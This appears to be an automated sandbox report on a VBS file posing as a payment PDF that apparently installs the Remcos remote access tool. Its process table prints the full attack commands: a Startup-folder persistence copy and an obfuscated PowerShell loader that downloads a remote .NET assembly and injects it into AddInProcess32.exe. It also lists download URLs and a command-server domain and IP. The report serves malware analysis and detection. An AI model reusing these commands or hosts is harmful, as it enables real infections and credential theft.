Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ol05cmj.2ww.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wd3nil0.nlv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ff3ttajc.cdk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqyoxitt.3io.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzvstumv.dnh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze1bl4os.guf.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT
SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
sbv.edadilibisnapxe.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName
+ ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+';
'+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent
= [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+'
[dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA,
e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/fb4UJ/0
|
188.114.97.3
|
|
|
|
ab9001.ddns.net
|
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt3dK;
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
ab9001.ddns.net
|
64.188.16.157
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
64.188.16.157
|
ab9001.ddns.net
|
United States
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-YJH0WY
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-YJH0WY
|
licence
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
12DB000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
12C8000
|
heap
|
page read and write
|
|
|
|
2001007E000
|
trusted library allocation
|
page read and write
|
|
|
|
2DDF000
|
stack
|
page read and write
|
|
|
|
2001111A000
|
trusted library allocation
|
page read and write
|
|
|
|
30DE000
|
stack
|
page read and write
|
||
|
7FF848770000
|
trusted library allocation
|
page read and write
|
||
|
2CF42DF2000
|
heap
|
page read and write
|
||
|
7FF848641000
|
trusted library allocation
|
page read and write
|
||
|
7FF848682000
|
trusted library allocation
|
page read and write
|
||
|
1FC60D76000
|
heap
|
page execute and read and write
|
||
|
7FF8487A0000
|
trusted library allocation
|
page read and write
|
||
|
1F12F7D8000
|
trusted library allocation
|
page read and write
|
||
|
1F12D905000
|
heap
|
page read and write
|
||
|
1FC48BF3000
|
trusted library allocation
|
page read and write
|
||
|
200003F3000
|
trusted library allocation
|
page read and write
|
||
|
20000223000
|
trusted library allocation
|
page read and write
|
||
|
1F12FF5A000
|
trusted library allocation
|
page read and write
|
||
|
2001061B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848730000
|
trusted library allocation
|
page read and write
|
||
|
1F12F7EF000
|
trusted library allocation
|
page read and write
|
||
|
1FC60C38000
|
heap
|
page read and write
|
||
|
7FF848810000
|
trusted library allocation
|
page read and write
|
||
|
1FC4904A000
|
trusted library allocation
|
page read and write
|
||
|
2CF42F7B000
|
heap
|
page read and write
|
||
|
7FF848670000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F14781D000
|
heap
|
page read and write
|
||
|
1F14783F000
|
heap
|
page read and write
|
||
|
1FC48650000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E96000
|
heap
|
page read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
25BFBE000
|
stack
|
page read and write
|
||
|
20000427000
|
trusted library allocation
|
page read and write
|
||
|
7FF848494000
|
trusted library allocation
|
page read and write
|
||
|
9866A7E000
|
stack
|
page read and write
|
||
|
2CF41016000
|
heap
|
page read and write
|
||
|
38DF000
|
stack
|
page read and write
|
||
|
7FF848642000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
2CF42E3B000
|
heap
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
7FF848730000
|
trusted library allocation
|
page read and write
|
||
|
2CF42DFB000
|
heap
|
page read and write
|
||
|
2006B7A0000
|
heap
|
page read and write
|
||
|
7FF84855C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006D100000
|
heap
|
page read and write
|
||
|
14BF000
|
stack
|
page read and write
|
||
|
7DD0C7B000
|
stack
|
page read and write
|
||
|
7FF848780000
|
trusted library allocation
|
page read and write
|
||
|
F737AFE000
|
stack
|
page read and write
|
||
|
2006D917000
|
heap
|
page read and write
|
||
|
2006D787000
|
heap
|
page read and write
|
||
|
25BBFE000
|
stack
|
page read and write
|
||
|
9866B7E000
|
stack
|
page read and write
|
||
|
1F12D85E000
|
heap
|
page read and write
|
||
|
2CF42E88000
|
heap
|
page read and write
|
||
|
9866C77000
|
stack
|
page read and write
|
||
|
7FF848660000
|
trusted library allocation
|
page execute and read and write
|
||
|
9866DFF000
|
stack
|
page read and write
|
||
|
2006CFE0000
|
trusted library allocation
|
page read and write
|
||
|
2006CFF0000
|
heap
|
page readonly
|
||
|
7FF8486B0000
|
trusted library allocation
|
page read and write
|
||
|
20010072000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E91000
|
heap
|
page read and write
|
||
|
1F147AE0000
|
heap
|
page read and write
|
||
|
7DD0A7F000
|
stack
|
page read and write
|
||
|
2CF42E4E000
|
heap
|
page read and write
|
||
|
9866F7B000
|
stack
|
page read and write
|
||
|
2CF410E8000
|
heap
|
page read and write
|
||
|
7FF848690000
|
trusted library allocation
|
page read and write
|
||
|
7FF848550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF84865A000
|
trusted library allocation
|
page read and write
|
||
|
1F12F82F000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486C0000
|
trusted library allocation
|
page read and write
|
||
|
2CF40F98000
|
heap
|
page read and write
|
||
|
7FF848690000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006DAF0000
|
heap
|
page read and write
|
||
|
98669FD000
|
stack
|
page read and write
|
||
|
2001101B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487A0000
|
trusted library allocation
|
page read and write
|
||
|
1F12F270000
|
heap
|
page read and write
|
||
|
1F12F1F0000
|
trusted library allocation
|
page read and write
|
||
|
2CF4105C000
|
heap
|
page read and write
|
||
|
1FC48CA9000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848790000
|
trusted library allocation
|
page read and write
|
||
|
2CF42F7F000
|
heap
|
page read and write
|
||
|
2006B60E000
|
heap
|
page read and write
|
||
|
2CF42F7E000
|
heap
|
page read and write
|
||
|
25BAFD000
|
stack
|
page read and write
|
||
|
F737535000
|
stack
|
page read and write
|
||
|
1F12F7EC000
|
trusted library allocation
|
page read and write
|
||
|
2CF42F01000
|
heap
|
page read and write
|
||
|
7FF848770000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486B0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42F73000
|
heap
|
page read and write
|
||
|
7FF8486E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848586000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8484A0000
|
trusted library allocation
|
page read and write
|
||
|
200016E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF84884B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848823000
|
trusted library allocation
|
page read and write
|
||
|
1F12D790000
|
heap
|
page read and write
|
||
|
200003F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848821000
|
trusted library allocation
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
7FF8484A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC46C70000
|
heap
|
page read and write
|
||
|
7FF848760000
|
trusted library allocation
|
page read and write
|
||
|
1F12FC85000
|
trusted library allocation
|
page read and write
|
||
|
12E4000
|
heap
|
page read and write
|
||
|
1F12D7F0000
|
heap
|
page read and write
|
||
|
1F12D832000
|
heap
|
page read and write
|
||
|
2CF42E88000
|
heap
|
page read and write
|
||
|
7FF8487E0000
|
trusted library allocation
|
page read and write
|
||
|
20010011000
|
trusted library allocation
|
page read and write
|
||
|
2000170A000
|
trusted library allocation
|
page read and write
|
||
|
2CF410DC000
|
heap
|
page read and write
|
||
|
2CF43000000
|
heap
|
page read and write
|
||
|
2CF42DF4000
|
heap
|
page read and write
|
||
|
1F12F71A000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E26000
|
heap
|
page read and write
|
||
|
7FF8485C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20000001000
|
trusted library allocation
|
page read and write
|
||
|
1F1478BC000
|
heap
|
page read and write
|
||
|
7FF8487C0000
|
trusted library allocation
|
page read and write
|
||
|
2CF410E8000
|
heap
|
page read and write
|
||
|
7FF84865A000
|
trusted library allocation
|
page read and write
|
||
|
1F12F6EB000
|
trusted library allocation
|
page read and write
|
||
|
1F12F739000
|
trusted library allocation
|
page read and write
|
||
|
1FC46CD0000
|
heap
|
page read and write
|
||
|
2000007B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487B0000
|
trusted library allocation
|
page read and write
|
||
|
1F12F1E0000
|
heap
|
page readonly
|
||
|
2CF42E63000
|
heap
|
page read and write
|
||
|
1FC491AA000
|
trusted library allocation
|
page read and write
|
||
|
2006D180000
|
heap
|
page read and write
|
||
|
25BCF9000
|
stack
|
page read and write
|
||
|
7FF8487B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8485B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006D4D9000
|
heap
|
page read and write
|
||
|
2CF42E68000
|
heap
|
page read and write
|
||
|
2CF42E98000
|
heap
|
page read and write
|
||
|
1F12D820000
|
heap
|
page read and write
|
||
|
1F12F74A000
|
trusted library allocation
|
page read and write
|
||
|
7DD09FE000
|
stack
|
page read and write
|
||
|
9866AFE000
|
stack
|
page read and write
|
||
|
1FC485A0000
|
trusted library allocation
|
page read and write
|
||
|
1FC48C0E000
|
trusted library allocation
|
page read and write
|
||
|
1FC48BB1000
|
trusted library allocation
|
page read and write
|
||
|
1FC48BC4000
|
trusted library allocation
|
page read and write
|
||
|
7DD097D000
|
stack
|
page read and write
|
||
|
200016E6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848651000
|
trusted library allocation
|
page read and write
|
||
|
2006D070000
|
trusted library allocation
|
page read and write
|
||
|
2006B5FA000
|
heap
|
page read and write
|
||
|
2CF42E78000
|
heap
|
page read and write
|
||
|
1F12D864000
|
heap
|
page read and write
|
||
|
2CF40F90000
|
heap
|
page read and write
|
||
|
2CF40F9A000
|
heap
|
page read and write
|
||
|
7FF848740000
|
trusted library allocation
|
page read and write
|
||
|
1FC49071000
|
trusted library allocation
|
page read and write
|
||
|
2CF42DF0000
|
heap
|
page read and write
|
||
|
1FC46C50000
|
heap
|
page read and write
|
||
|
2CF42F00000
|
heap
|
page read and write
|
||
|
2006D000000
|
trusted library allocation
|
page read and write
|
||
|
1F12F7DB000
|
trusted library allocation
|
page read and write
|
||
|
7FF84883C000
|
trusted library allocation
|
page read and write
|
||
|
2006B800000
|
heap
|
page read and write
|
||
|
1F12D7B0000
|
heap
|
page read and write
|
||
|
2CF42E2B000
|
heap
|
page read and write
|
||
|
1FC46D5D000
|
heap
|
page read and write
|
||
|
25BDB8000
|
stack
|
page read and write
|
||
|
7FF84854C000
|
trusted library allocation
|
page execute and read and write
|
||
|
20000517000
|
trusted library allocation
|
page read and write
|
||
|
2006D6A7000
|
heap
|
page execute and read and write
|
||
|
2F5F000
|
stack
|
page read and write
|
||
|
1FC60C9A000
|
heap
|
page read and write
|
||
|
2CF42E2E000
|
heap
|
page read and write
|
||
|
7FF848750000
|
trusted library allocation
|
page read and write
|
||
|
2006B5F8000
|
heap
|
page read and write
|
||
|
7FF848780000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
1FC46CD9000
|
heap
|
page read and write
|
||
|
F7381FF000
|
stack
|
page read and write
|
||
|
2CF42E6B000
|
heap
|
page read and write
|
||
|
7FF848740000
|
trusted library allocation
|
page read and write
|
||
|
31DF000
|
stack
|
page read and write
|
||
|
2CF410A7000
|
heap
|
page read and write
|
||
|
1FC48CAC000
|
trusted library allocation
|
page read and write
|
||
|
10C0000
|
heap
|
page read and write
|
||
|
2CF42E17000
|
heap
|
page read and write
|
||
|
2CF42F4A000
|
heap
|
page read and write
|
||
|
2CF42E63000
|
heap
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848790000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486C0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42F72000
|
heap
|
page read and write
|
||
|
7FF848710000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E80000
|
heap
|
page read and write
|
||
|
2CF42E5F000
|
heap
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
9867A4D000
|
stack
|
page read and write
|
||
|
7FF848750000
|
trusted library allocation
|
page read and write
|
||
|
7FF848660000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC490DC000
|
trusted library allocation
|
page read and write
|
||
|
1F147980000
|
heap
|
page read and write
|
||
|
7FF8484AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006D8B0000
|
heap
|
page read and write
|
||
|
7FF8484A4000
|
trusted library allocation
|
page read and write
|
||
|
2CF4109E000
|
heap
|
page read and write
|
||
|
1F12D87E000
|
heap
|
page read and write
|
||
|
7FF848560000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848750000
|
trusted library allocation
|
page read and write
|
||
|
2006D040000
|
trusted library allocation
|
page read and write
|
||
|
7FF8484AC000
|
trusted library allocation
|
page read and write
|
||
|
7DD0BF7000
|
stack
|
page read and write
|
||
|
7DD0EFE000
|
stack
|
page read and write
|
||
|
F7379FE000
|
stack
|
page read and write
|
||
|
1F12D8A8000
|
heap
|
page read and write
|
||
|
F7382FB000
|
stack
|
page read and write
|
||
|
7FF848550000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E8E000
|
heap
|
page read and write
|
||
|
1FC48BA0000
|
heap
|
page read and write
|
||
|
2CF42E86000
|
heap
|
page read and write
|
||
|
7FF848540000
|
trusted library allocation
|
page read and write
|
||
|
7FF8484A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF84849D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006B635000
|
heap
|
page read and write
|
||
|
1FC46D19000
|
heap
|
page read and write
|
||
|
1F12F6C0000
|
heap
|
page read and write
|
||
|
F7378FE000
|
stack
|
page read and write
|
||
|
9866D7E000
|
stack
|
page read and write
|
||
|
1F12F7DE000
|
trusted library allocation
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
7DD0B77000
|
stack
|
page read and write
|
||
|
7FF848546000
|
trusted library allocation
|
page read and write
|
||
|
1FC46CB0000
|
heap
|
page read and write
|
||
|
7FF848660000
|
trusted library allocation
|
page execute and read and write
|
||
|
F737EFD000
|
stack
|
page read and write
|
||
|
9866BF9000
|
stack
|
page read and write
|
||
|
7FF8486D0000
|
trusted library allocation
|
page read and write
|
||
|
25BE39000
|
stack
|
page read and write
|
||
|
2CF4305D000
|
heap
|
page read and write
|
||
|
1FC60BB0000
|
heap
|
page read and write
|
||
|
2CF42E21000
|
heap
|
page read and write
|
||
|
7FF848790000
|
trusted library allocation
|
page read and write
|
||
|
7FF848730000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848710000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E96000
|
heap
|
page read and write
|
||
|
7FF8486D0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4CEDE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F737DFE000
|
stack
|
page read and write
|
||
|
2CF40FF0000
|
heap
|
page read and write
|
||
|
200102FB000
|
trusted library allocation
|
page read and write
|
||
|
1F1477E6000
|
heap
|
page read and write
|
||
|
1FC60C54000
|
heap
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
2CF42E96000
|
heap
|
page read and write
|
||
|
1FC491B4000
|
trusted library allocation
|
page read and write
|
||
|
200019B3000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E88000
|
heap
|
page read and write
|
||
|
1FC46D13000
|
heap
|
page read and write
|
||
|
7FF8487F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848740000
|
trusted library allocation
|
page read and write
|
||
|
2CF40F70000
|
heap
|
page read and write
|
||
|
2CF42970000
|
heap
|
page read and write
|
||
|
7DD0F7B000
|
stack
|
page read and write
|
||
|
200003FB000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E0F000
|
heap
|
page read and write
|
||
|
2006B5F0000
|
heap
|
page read and write
|
||
|
2006B590000
|
heap
|
page read and write
|
||
|
2CF40F98000
|
heap
|
page read and write
|
||
|
1F13F6D1000
|
trusted library allocation
|
page read and write
|
||
|
20001660000
|
trusted library allocation
|
page read and write
|
||
|
1F1478AA000
|
heap
|
page read and write
|
||
|
7FF8487D0000
|
trusted library allocation
|
page read and write
|
||
|
7DD0523000
|
stack
|
page read and write
|
||
|
2006D6CF000
|
heap
|
page read and write
|
||
|
7DD0AFE000
|
stack
|
page read and write
|
||
|
2006DC40000
|
trusted library section
|
page read and write
|
||
|
7FF848720000
|
trusted library allocation
|
page read and write
|
||
|
1F1478DC000
|
heap
|
page read and write
|
||
|
7FF8484AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8485C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848700000
|
trusted library allocation
|
page read and write
|
||
|
25BD3E000
|
stack
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
2CF41069000
|
heap
|
page read and write
|
||
|
25B7EF000
|
stack
|
page read and write
|
||
|
7FF8484BB000
|
trusted library allocation
|
page read and write
|
||
|
7FF8484B0000
|
trusted library allocation
|
page read and write
|
||
|
7DD0CF9000
|
stack
|
page read and write
|
||
|
1FC48CB0000
|
trusted library allocation
|
page read and write
|
||
|
2CF4109E000
|
heap
|
page read and write
|
||
|
2006B5EE000
|
heap
|
page read and write
|
||
|
7DD0DFE000
|
stack
|
page read and write
|
||
|
2CF42F4B000
|
heap
|
page read and write
|
||
|
1FC46D31000
|
heap
|
page read and write
|
||
|
2CF42E0A000
|
heap
|
page read and write
|
||
|
2CF410E4000
|
heap
|
page read and write
|
||
|
25C03E000
|
stack
|
page read and write
|
||
|
1FC60BE7000
|
heap
|
page read and write
|
||
|
9866E7E000
|
stack
|
page read and write
|
||
|
1F12D8A6000
|
heap
|
page read and write
|
||
|
2006D6B0000
|
heap
|
page read and write
|
||
|
1F12D780000
|
heap
|
page read and write
|
||
|
7FF84864A000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
7FF848576000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006D186000
|
heap
|
page read and write
|
||
|
1FC48CEE000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E5A000
|
heap
|
page read and write
|
||
|
2006B780000
|
heap
|
page read and write
|
||
|
1FC48CA6000
|
trusted library allocation
|
page read and write
|
||
|
2006D71B000
|
heap
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
1F12F76C000
|
trusted library allocation
|
page read and write
|
||
|
2CF41099000
|
heap
|
page read and write
|
||
|
2CF42F76000
|
heap
|
page read and write
|
||
|
1FC48570000
|
heap
|
page read and write
|
||
|
200016F8000
|
trusted library allocation
|
page read and write
|
||
